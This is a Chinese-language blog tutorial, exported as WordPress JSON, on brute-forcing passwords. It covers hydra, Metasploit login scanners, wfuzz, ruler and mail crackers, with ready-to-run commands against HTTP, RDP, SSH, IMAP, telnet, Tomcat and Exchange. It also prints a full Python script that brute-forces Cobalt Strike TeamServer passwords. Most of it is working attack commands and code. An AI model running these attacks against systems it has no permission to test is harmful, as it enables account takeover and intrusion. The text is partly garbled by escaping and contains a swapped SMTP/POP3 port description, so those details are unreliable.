\u4f7f\u7528hydra\u7a77\u4e3ehttp\u670d\u52a1<\/h2>\n
hydra -l admin -P 2019_top100.txt -vV -f www.c1moon.com http-post-form "\/admin\/index.php:user=^USER^&ps=^PASS^&action=login:login-error"<\/p>\n
\"1745813244899-72716ed1-c8c0-4d2b-ae36-d7fc26ffb0ae.png\"\u4f7f\u7528 hydra \u7a77\u4e3e pop3 \u670d\u52a1<\/h2>\n
hydra -L user.txt -P qweasd123 192.168.52.6 smtp-vV -f<\/p>\n
\u4f7f\u7528 hydra \u7a77\u4e3e rdp \u670d\u52a1<\/h2>\n
hydra ip rdp -l administrator -P pass.txt -V<\/p>\n
\u4f7f\u7528 hydra \u7a77\u4e3e http-proxy \u670d\u52a1<\/h2>\n
hydra -l admin -P pass.txt http-proxy:\/\/10.36.16.18<\/p>\n
\u4f7f\u7528 hydra \u7a77\u4e3e imap \u670d\u52a1<\/h2>\n
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<\/p>\n
hydra -C defaults.txt -6 imap:\/\/[fe80::2c:31ff:fe12:ac11]:143\/PLAIN<\/p>\n
\u4f7f\u7528 hydra \u7a77\u4e3e telnet \u670d\u52a1<\/h2>\n
hydra ip telnet -l \u7528\u6237 -P \u5bc6\u7801\u5b57\u5178 -t 32 -s 23 -e ns -f -V<\/p>\n
xhyra\u7a77\u4e3e\u7834\u89e3\u5404\u79cd\u670d\u52a1<\/h1>\n
xhydra \u662f hydra \u7684\u53ef\u89c6\u5316\u5de5\u5177 \u4f7f\u7528\u7b80\u5355\u65b9\u4fbf\u5feb\u6377\u3002<\/p>\n
\u7ec8\u7aef\u8f93\u5165 xhydra \u5373\u53ef\u4f7f\u7528\u3002<\/p>\n
\u4f7f\u7528 hydra \u7834\u89e3 rdp \u670d\u52a1<\/p>\n
\"1745813300300-67b63c77-abf9-4014-ba70-d4ae8651282c.png\"\"1745813306994-1ab655f9-8f31-4e87-a3f8-dc7f2ad25380.png\"\"1745813312033-041eefeb-c582-47ff-a573-733a85e242b0.png\"<\/p>\n
metasploit\u7a77\u4e3e\u6a21\u5757\u4f7f\u7528<\/h1>\n
metasploit \u662f\u4e00\u4e2a\u6e17\u900f\u6d4b\u8bd5\u96c6\u6210\u5957\u4ef6 \u540c\u6837\u4e5f\u6709\u7a77\u4e3e\u6a21\u5757<\/p>\n
auxiliary\/scanner\/ftp\/ftp_login<\/p>\n
auxiliary\/scanner\/ssh\/ssh_login<\/p>\n
auxiliary\/scanner\/telnet\/telnet_login<\/p>\n
auxiliary\/scanner\/smb\/smb_login<\/p>\n
auxiliary\/scanner\/mssql\/mssql_login<\/p>\n
auxiliary\/scanner\/mysql\/mysql_login<\/p>\n
auxiliary\/scanner\/oracle\/oracle_login<\/p>\n
auxiliary\/scanner\/postgres\/postgres_login<\/p>\n
auxiliary\/scanner\/vnc\/vnc_login<\/p>\n
auxiliary\/scanner\/pcanywhere\/pcanywhere_login<\/p>\n
auxiliary\/scanner\/snmp\/snmp_login<\/p>\n
\u6a21\u5757\u7684\u7528\u6cd5<\/p>\n
\u9996\u5148\u542f\u52a8\u5728\u7ec8\u7aef\u4e0b\u542f\u52a8 msfconsole<\/p>\n
use \u4f7f\u7528 ssh_login \u6a21\u5757<\/p>\n
use auxiliary\/scanner\/ssh\/ssh_login<\/p>\n
show options \u67e5\u770b\u6a21\u5757\u7684\u53c2\u6570<\/p>\n
\"1745813350339-02ed9c86-5223-4455-b99c-cdfb2b726015.png\"<\/p>\n
RHOSTS \u653b\u51fb\u7684\u76ee\u6807<\/p>\n
PASS_FILE \u5bc6\u7801\u5b57\u5178<\/p>\n
STOP_ON_SUCCESS \u6210\u529f\u7834\u89e3\u4e00\u4e2a\u7ec8\u6b62<\/p>\n
THREADS \u7ebf\u7a0b\u6570<\/p>\n
set \u8bbe\u7f6e\u53c2\u6570<\/p>\n
msf5 auxiliary(scanner\/ssh\/ssh_login) > set PASS_FILE \/home\/kali\/2019_top100.txt<\/p>\n
PASS_FILE => \/home\/kali\/2019_top100.txt<\/p>\n
msf5 auxiliary(scanner\/ssh\/ssh_login) > set RHOSTS 192.168.52.13<\/p>\n
RHOSTS => 192.168.52.13<\/p>\n
msf5 auxiliary(scanner\/ssh\/ssh_login) > set STOP_ON_SUCCESS true<\/p>\n
STOP_ON_SUCCESS => true<\/p>\n
msf5 auxiliary(scanner\/ssh\/ssh_login) > set USERNAME root<\/p>\n
USERNAME => root<\/p>\n
msf5 auxiliary(scanner\/ssh\/ssh_login) > show options<\/p>\n
\u8bbe\u7f6e\u597d\u540e\u7528 run \u6216\u8005 exploit \u8fdb\u884c\u653b\u51fb<\/p>\n
\"1745817516000-83f3e1cf-8de1-4d2c-82cb-9fb5eebac0bc.png\"<\/p>\n
\u5fa1\u5251RDP\u7206\u7834\u5de5\u5177<\/h1>\n
\"1745817535115-c6fff823-7b08-40b7-93f2-960d067fc95d.png\"<\/p>\n
wfuzz\u591a\u7ebf\u7a0b\u7a77\u4e3e\u5bc6\u7801<\/h1>\n
\u7528\u6cd5\uff1awfuzz [options] -z payload,params <\/p>\n
Examples:<\/p>\n
wfuzz -c -z file,users.txt -z file,pass.txt –sc 200 http:\/\/www.site.com\/log.asp?user=FUZZ&pass=FUZ2Z<\/a><\/p>\n
wfuzz -c -z range,1-10 –hc=BBB http:\/\/www.site.com\/FUZZ{something<\/a> not there}<\/p>\n
wfuzz –script=robots -z list,robots.txt http:\/\/www.webscantest.com\/FUZZ<\/a><\/p>\n
wfuzz -c -z file,2019_top100.txt –sc 302 -u<\/p>\n
http:\/\/www.c1moon.com\/admin\/index.php?action=login<\/a> -d "user=admin&pw=FUZZ"<\/p>\n
wfuzz -c -z file,2019_top100.txt –hc 404 –hh 1549 -u<\/p>\n
http:\/\/www.c1moon.com\/admin\/index.php?action=login<\/a> -d "user=admin&pw=FUZZ"<\/p>\n
wfuzz -c -w \/home\/kali\/csdnpass.txt –hc 404 –hh 1549 -u<\/p>\n
http:\/\/www.c1moon.com\/admin\/index.php?action=login<\/a> -d "user=admin&pw=FUZZ"<\/p>\n
\"1745817570653-f659bf12-346c-42c6-a746-8a399a320f46.png\"<\/p>\n
\u90ae\u7bb1\u5bc6\u7801\u7a77\u4e3e<\/h1>\n
\u9ed8\u8ba4\u7684\u6536\u53d1\u90ae\u4ef6\u7aef\u53e3\u4fe1\u606f<\/p>\n
\u53d1\u90ae\u4ef6 pop3 110 \u52a0\u5bc6 995<\/p>\n
\u6536\u90ae\u4ef6 smtp 25 \u52a0\u5bc6 465<\/p>\n
\u4f01\u4e1a\u72ec\u7acb\u642d\u5efa\u7684\u90ae\u4ef6\u670d\u52a1 \u7528MailCracker\u7834\u89e3<\/h1>\n
\"1745817608159-5f46fdd4-5180-4cea-8d6d-f18136341261.png\"<\/p>\n
\u9488\u5bf9163 qq\u8fd9\u4e9b\u90ae\u7bb1\u7528mail\u811a\u672c\u7a77\u4e3e<\/h1>\n
\u50cf 163 qq \u8fd9\u4e9b\u90ae\u7bb1 \u5e76\u53d1\u4f1a\u62e6\u622a\uff0c\u800c\u4e14\u4e0d\u80fd\u7a77\u4e3e\u592a\u591a\u3002\u4e00\u822c\u914d\u5408\u793e\u5de5\u529e\u6cd5\u6765\u7a77\u4e3e<\/p>\n
\"1745817638206-8239367e-9ab0-45c5-a648-62ebaa1cced4.png\"<\/p>\n
CobaltStrike TeamServer\u53e3\u4ee4\u7206\u7834<\/h1>\n
Cobalt Strike \u662f\u4e00\u6b3e\u8d85\u7ea7\u597d\u7528\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u62e5\u6709\u591a\u79cd\u534f\u8bae\u4e3b\u673a\u4e0a\u7ebf\u65b9\u5f0f\uff0c\u96c6\u6210\u4e86\u63d0\u6743\uff0c\u51ed\u636e\u5bfc\u51fa\uff0c\u7aef\u53e3\u8f6c\u53d1\uff0csocket \u4ee3\u7406\uff0coffice \u653b\u51fb\uff0c\u6587\u4ef6\u6346\u7ed1\uff0c\u9493\u9c7c\u7b49\u591a\u79cd\u529f\u80fd\u3002\u540c\u65f6\uff0cCobalt Strike \u8fd8\u53ef\u4ee5\u8c03\u7528 Mimikatz \u7b49\u5176\u4ed6\u77e5\u540d\u5de5\u5177\uff0c\u56e0\u6b64\u5e7f\u53d7\u6280\u672f\u5927\u4f6c\u7684\u559c\u7231\u3002Cobalt Strike \u662f\u4e00\u6b3e\u8d85\u7ea7\u597d\u7528\u7684\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u62e5\u6709\u591a\u79cd\u534f\u8bae\u4e3b\u673a\u4e0a\u7ebf\u65b9\u5f0f\uff0c\u96c6\u6210\u4e86\u63d0\u6743\uff0c\u51ed\u636e\u5bfc\u51fa\uff0c\u7aef\u53e3\u8f6c\u53d1\uff0csocket \u4ee3\u7406\uff0coffice \u653b\u51fb\uff0c\u6587\u4ef6\u6346\u7ed1\uff0c\u9493\u9c7c\u7b49\u591a\u79cd\u529f\u80fd\u3002\u540c\u65f6\uff0cCobalt Strike \u8fd8\u53ef\u4ee5\u8c03\u7528 Mimikatz \u7b49\u5176\u4ed6\u77e5\u540d\u5de5\u5177\uff0c\u56e0\u6b64\u5e7f\u53d7\u6280\u672f\u5927\u4f6c\u7684\u559c\u7231\u3002<\/p>\n
Cobalt Strike \u662f\u7531\u7f8e\u56fd Red Team \u5f00\u53d1\uff0c\u5b98\u7f51\u5730\u5740\uff1a<\/p>\n
http:\/\/cobaltstrike.com<\/a><\/p>\n
\u8fd9\u4e2a\u5de5\u5177\u7684\u793e\u533a\u7248\u662f\u5927\u5bb6\u719f\u77e5\u7684 Armitage(\u4e00\u4e2a MSF \u7684\u56fe\u5f62\u5316\u754c\u9762\u5de5\u5177)\uff0c\u800c<\/p>\n
Cobalt Strike \u5927\u5bb6\u53ef\u4ee5\u7406\u89e3\u5176\u4e3a Armitage \u7684\u5546\u4e1a\u7248\u3002<\/p>\n
TeamServer \u53e3\u4ee4\u66b4\u529b\u7834\u89e3<\/p>\n
\u7136\u800c\u4eca\u5929\u6211\u4eec\u5e76\u4e0d\u662f\u4ecb\u7ecd\u548c\u8bb2\u89e3 Cobalt Strike\uff0c\u800c\u662f\u5173\u4e8e Cobalt Strike \u7684\u53e3\u4ee4\u66b4<\/p>\n
\u529b\u7834\u89e3\uff0c\u4f17\u6240\u5468\u77e5 Cobalt Strike \u7684\u5de5\u4f5c\u65b9\u5f0f\u662f\u4ee5 TeamServer \u4e3a\u6838\u5fc3\uff0c\u53ef\u591a\u4e2a Cilent<\/p>\n
\u7684 CS\uff08Server Cilent\uff09\u67b6\u6784\u3002<\/p>\n
\u542f\u52a8 teamserver<\/p>\n
sudo .\/teamserver 192.168.0.102 123456<\/p>\n
\u542f\u52a8 temaerver \u4e4b\u540e\u53ef\u4ee5\u901a\u8fc7\u5ba2\u6237\u7aef\u8fde\u63a5\u8fde\u63a5\u670d\u52a1\u5668 \u9ed8\u8ba4\u7684\u7aef\u53e3\u662f 50050 \u5bc6\u7801<\/p>\n
\u662f 123456 \u5373\u53ef\u767b\u5f55\u3002<\/p>\n
\u5982\u679c\u628a teamserver \u653e\u5728\u516c\u7f51\u4e0a\uff0c\u53e3\u4ee4\u8bbe\u7f6e\u8584\u5f31 \u53ef\u4ee5\u901a\u8fc7\u5bf9\u5176\u7a77\u4e3e\u6709\u4e00\u5b9a\u7684\u51e0\u7387<\/p>\n
\u83b7\u53d6 teamserver \u7684\u6743\u9650\uff0c\u90a3\u4e48\u670d\u52a1\u5668\u91cc\u7684\u88ab\u6210\u529f\u63a7\u5236\u7684\u673a\u5668\uff0c\u6211\u4eec\u4e5f\u53ef\u4ee5\u5bf9\u5176<\/p>\n
\u63a7\u5236\u3002\u6240\u4ee5\u8bf4\u5371\u5bb3\u662f\u975e\u5e38\u5927\u7684\u3002<\/p>\n
\u4f7f\u7528 csbuster.py \u5bf9 50050 \u7aef\u53e3\u8fdb\u884c\u5bc6\u7801\u7a77\u4e3e<\/p>\n
#!\/usr\/bin\/env python3\n# -*- coding:gbk -*-\nimport time\nimport socket\nimport ssl\nimport argparse\nimport concurrent.futures\nimport sys\n# csbrute.py - Cobalt Strike Team Server Password Brute Forcer\n#\nhttps:\/\/stackoverflow.com\/questions\/6224736\/how-to-write-python-code-that-is-able-t\no-properly-require-a-minimal-python-versi\nMIN_PYTHON = (3, 3)\nif sys.version_info < MIN_PYTHON:\nsys.exit(\"Python %s.%s or later is required.n\" % MIN_PYTHON)\nparser = argparse.ArgumentParser()\nparser.add_argument(\"host\",\nhelp=\"Teamserver address\")\nparser.add_argument(\"wordlist\", nargs=\"?\",\nhelp=\"Newline-delimited word list file\")\nparser.add_argument(\"-p\", dest=\"port\", default=50050, type=int,\nhelp=\"Teamserver port\")\nparser.add_argument(\"-t\", dest=\"threads\", default=25, type=int,\nhelp=\"Concurrency level\")\nargs = parser.parse_args()\n#\nhttps:\/\/stackoverflow.com\/questions\/27679890\/how-to-handle-ssl-connections-in-raw-\npython-socket\nclass NotConnectedException(Exception):\ndef __init__(self, message=None, node=None):\nself.message = message\nself.node = node\nclass DisconnectedException(Exception):\ndef __init__(self, message=None, node=None):\nself.message = message\nself.node = node\nclass Connector:\ndef __init__(self):\nself.sock = None\nself.ssl_sock = None\nself.ctx = ssl.SSLContext()\nself.ctx.verify_mode = ssl.CERT_NONE\npass\ndef is_connected(self):\nreturn self.sock and self.ssl_sock\ndef open(self, hostname, port):\nself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nself.sock.settimeout(10)\nself.ssl_sock = self.ctx.wrap_socket(self.sock)\nif hostname == socket.gethostname():\nipaddress = socket.gethostbyname_ex(hostname)[2][0]\nself.ssl_sock.connect((ipaddress, port))\nelse:\nself.ssl_sock.connect((hostname, port))\ndef close(self):\nif self.sock:\nself.sock.close()\nself.sock = None\nself.ssl_sock = None\ndef send(self, buffer):\nif not self.ssl_sock: raise NotConnectedException(\"Not connected (SSL\nSocket is null)\")\nself.ssl_sock.sendall(buffer)\ndef receive(self):\nif not self.ssl_sock: raise NotConnectedException(\"Not connected (SSL\nSocket is null)\")\nreceived_size = 0\ndata_buffer = b\"\"\nwhile received_size < 4:\ndata_in = self.ssl_sock.recv()\ndata_buffer = data_buffer + data_in\nreceived_size += len(data_in)\nreturn data_buffer\ndef passwordcheck(password):\nif len(password) > 0:\nresult = None\nconn = Connector()\nconn.open(args.host, args.port)\npayload = bytearray(b\"x00x00xbexef\") + len(password).to_bytes(1,\n\"big\", signed=True) + bytes(\nbytes(password, \"ascii\").ljust(256, b\"A\"))\nconn.send(payload)\nif conn.is_connected(): result = conn.receive()\nif conn.is_connected(): conn.close()\nif result == bytearray(b\"x00x00xcaxfe\"):\nreturn password\nelse:\nreturn False\nelse:\nprint(\"Ignored blank password\")\npasswords = []\nif args.wordlist:\nprint(\"Wordlist: {}\".format(args.wordlist))\npasswords = open(args.wordlist).read().split(\"n\")\nelse:\nprint(\"Wordlist: {}\".format(\"stdin\"))\nfor line in sys.stdin:\npasswords.append(line.rstrip())\nif len(passwords) > 0:\nprint(\"Word Count: {}\".format(len(passwords)))\nprint(\"Threads: {}\".format(args.threads))\nstart = time.time()\n# https:\/\/stackoverflow.com\/questions\/2846653\/how-to-use-threading-in-python\nattempts = 0\nfailures = 0\nwith concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as\nexecutor:\nfuture_to_check = {executor.submit(passwordcheck, password): password\nfor password in passwords}\nfor future in concurrent.futures.as_completed(future_to_check):\npassword = future_to_check[future]\ntry:\ndata = future.result()\nattempts = attempts + 1\nif data:\nprint(\"Found Password: {}\".format(password))\nexcept Exception as exc:\nfailures = failures + 1\nprint('%r generated an exception: %s' % (password, exc))\nprint(\"Attempts: {}\".format(attempts))\nprint(\"Failures: {}\".format(failures))\nfinish = time.time()\nprint(\"Seconds: {:.1f}\".format(finish - start))\nprint(\"Attemps per second: {:.1f}\".format((failures + attempts) \/ (finish - start)))\nelse:\nprint(\"Password(s) required\")\npython3 csbuster.py 192.168.0.102 \/home\/kali\/top1000.txt -t 20\n<\/code><\/pre>\n
\"1745817778055-bb5b0647-d44d-4f85-b8ea-bf2763db056e.png\"<\/p>\n
\u5bf9tomcat\u670d\u52a1\u7a77\u4e3e<\/h1>\n
Apache Tomcat \u662f\u4e16\u754c\u4e0a\u4f7f\u7528\u6700\u5e7f\u6cdb\u7684 Java Web \u5e94\u7528\u670d\u52a1\u5668\u4e4b\u4e00\uff0c\u7edd\u5927\u6570\u4eba\u90fd\u4f1a\u4f7f\u7528 Tomcat \u7684\u9ed8\u8ba4\u914d\u7f6e\u3002\u7136\u800c\u9ed8\u8ba4\u914d\u7f6e\u4e2d\u4f1a\u6709\u4e00\u4e2a\u5411\u5916\u7f51\u5f00\u653e\u7684 Web \u5e94\u7528\u7ba1\u7406\u5668\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u5229\u7528\u5b83\u5728\u670d\u52a1\u5668\u4e2d\u542f\u52a8\u3001\u505c\u6b62\u3001\u6dfb\u52a0\u548c\u5220\u9664\u5e94\u7528\u3002<\/p>\n
\"1745817807226-b9c24f27-32d4-488b-b046-7528b633fdcb.png\"<\/p>\n
use scanner\/http\/tomcat_mgr_login<\/p>\n
set PASSWORD \u8bbe\u7f6e\u5bc6\u7801\u5b57\u5178<\/p>\n
set RPORT 8081 \u8bbe\u7f6e\u7aef\u53e3<\/p>\n
set RHOSTS 192.168.52.6<\/p>\n
exploit \u653b\u51fb<\/p>\n
\"1745817821565-9e880274-30a1-4c33-9a59-cf6e31a7f797.png\"<\/p>\n
\u8d85\u7ea7\u5f31\u53e3\u4ee4\u7a77\u4e3e<\/h1>\n
\"1745817835823-fe383faa-eb04-488d-ac10-68740ef5562f.png\"<\/p>\n
exchange\u90ae\u670d\u7a77\u4e3e<\/h1>\n
ruler -domain evilcorp.ninja -brute -usernames~\/users.txt -passwords ~\/passwords.txt<\/p>\n
-delay 0 -v -insecure<\/p>\n
\n
\u66f4\u65b0: 2025-04-28 13:25:01
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/zg6bpzg5kfggipug<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
\u53e3\u4ee4\u7a77\u4e3e\u7206\u7834 \u7a77\u4e3e\u5c31\u662f\u679a\u4e3e\u7684\u610f\u601d\uff0c\u5728\u4e92\u8054\u7f51\u7684\u4eca\u5929\uff0c\u9700\u8981\u4f7f\u7528\u67d0\u79cd\u7684\u670d\u52a1\uff0c\u5927\u591a\u6570\u90fd\u9700\u8981\u53e3\u4ee4\u767b\u5f55\uff0c\u8fd9\u4e2a\u53e3\u4ee4\u5c31\u662f\u5bc6\u7801\uff0c\u5bc6\u7801\u7684\u5f3a\u5ea6\u5206\u4e3a\uff0c\u5f31\u53e3\u4ee4 \u3001\u4e2d\u5ea6\u53e3\u4ee4\u3001\u5f3a\u5ea6\u53e3\u4ee4\u3002 \u5982\u679c\u767b\u5f55\u7684\u670d\u52a1\u4e3a\u5f31\u53e3\u4ee4\uff0c\u90a3\u4f1a\u5b58\u5728\u5f88\u5927\u7684\u5b89\u5168\u9690\u60a3\uff0c\u9ed1\u5ba2\u901a\u8fc7\u7a77\u4e3e\u5f31\u53e3\u4ee4\u5bf9\u670d\u52a1\u8fdb\u884c\u653b\u51fb\uff0c\u5f88\u5bb9\u6613\u5c31\u5f97\u5230\u767b\u5f55\u5bc6\u7801\u3002\u5f97\u5230\u5bc6\u7801\u4e4b\u540e\u5c31\u80fd\u767b\u5f55\u670d\u52a1\uff0c\u8fdb\u884c\u5176\u4ed6\u5371 \u5bb3\u8f83\u5927\u5f97\u64cd\u4f5c\u3002\u9ed1\u5ba2\u4e5f\u80fd\u901a\u8fc7\u5bf9\u7528\u6237\u5f97\u4fe1\u606f\u6574\u7406\uff0c\u7ec4\u5408\u5bc6\u7801\u8fdb\u884c\u7a77\u4e3e\u653b\u51fb\u3002\u4f8b\u5982\u6839\u636e\u7528\u6237\u7684\u751f\u65e5\u53f7\u7801\uff0c\u51fa\u8eab\u5e74\u6708\u65e5 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[119,120,2],"tags":[28,29,43,57,82],"class_list":["post-779","post","type-post","status-publish","format-standard","hentry","category-shentouceshijichu-network_sec","category-loudongleibie","category-network_sec","tag-kali","tag-java","tag-43","tag-python","tag-sdn"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=779"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/779\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}